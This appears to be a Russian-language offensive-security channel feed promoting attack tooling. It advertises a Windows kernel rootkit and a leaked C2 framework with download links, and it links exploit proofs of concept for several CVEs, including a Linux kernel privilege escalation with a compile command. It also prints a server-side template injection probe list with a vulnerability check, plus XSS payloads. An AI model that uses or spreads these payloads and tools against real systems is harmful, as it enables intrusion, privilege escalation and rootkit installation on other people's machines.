Banshee
*

Windows x64 Kernel Rootkit (Experimental)

*
Умеет:
- Kill processes
- Change protection levels
- Elevate any process token to SYSTEM
- Enumerating and erasing kernel callbacks
- Protecting the driver file
- Hide Process by PID
*
TODO list - обещает интересное расширение функционала
*
download win_rootkit

#win #rootkit

Ночью LockBit восстановил сервера, и выдал обращение

CVE-2024-21338
*
Годная статья
Lazarus и руткит FudModule: за пределами BYOVD с нулевым днем ​​от администратора до ядра
*

CVE-2024-27198
обход аутентификации с использованием уязвимости альтернативного пути в JetBrains TeamCity Server
*

#jets

Рубрика интересно
Возможна удаленная атака в стиле Stuxnet с использованием Web-Based PLC Malware: Researchers
Link

#stuxnet

Server Side Template Injection Payload List

{7*7}
*{7*7}
{{7*7}}
[[7*7]]
${7*7}
@(7*7)
<?=7*7?>
<%= 7*7 %>
${= 7*7}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]

если отдает 49 - цель уязвима

#SSTI

XieBroC2
C&C
Слили в открытый доступ все, кроме кода командного сервера.
download

#C2

Уязвимость DataCube3
POC сочетает в себе CVE-2024-25830 (неправильный контроль доступа) для извлечения паролей root и CVE-2024-25832 (неограниченная загрузка файлов) для развертывания reverse shell
*
POC

CVE-2024-1403
*
Progress OpenEdge Authentication Bypass
*
exploit proof of concept

CVE-2024-25153: Remote Code Execution
Fortra FileCatalyst
*
POC
*

%3C/noscript%20%3E

или
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E

#xss

На ночь 3 минуты
*
exploits.club - Weekly Newsletter 12
*
Link

CVE-2023-6817
Linux kernel: use-after-free in nf_tables
*
ДЫрка в ядре Linux nf_tables, приводит к DoS или LPE.
Патч в версии linux 6.7-rc5
Скомпилять POC можно так:
gcc -o poc poc.c -lnftnl -lmnl

CVE-2023-36424
Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation
exploit

хммм, ну оке

Linux 😊

C=$(tput cols);L=$(tput lines);while :;do x=$(($RANDOM%$C));y=$(($RANDOM%$L));printf "\033[${y};${x}fF";done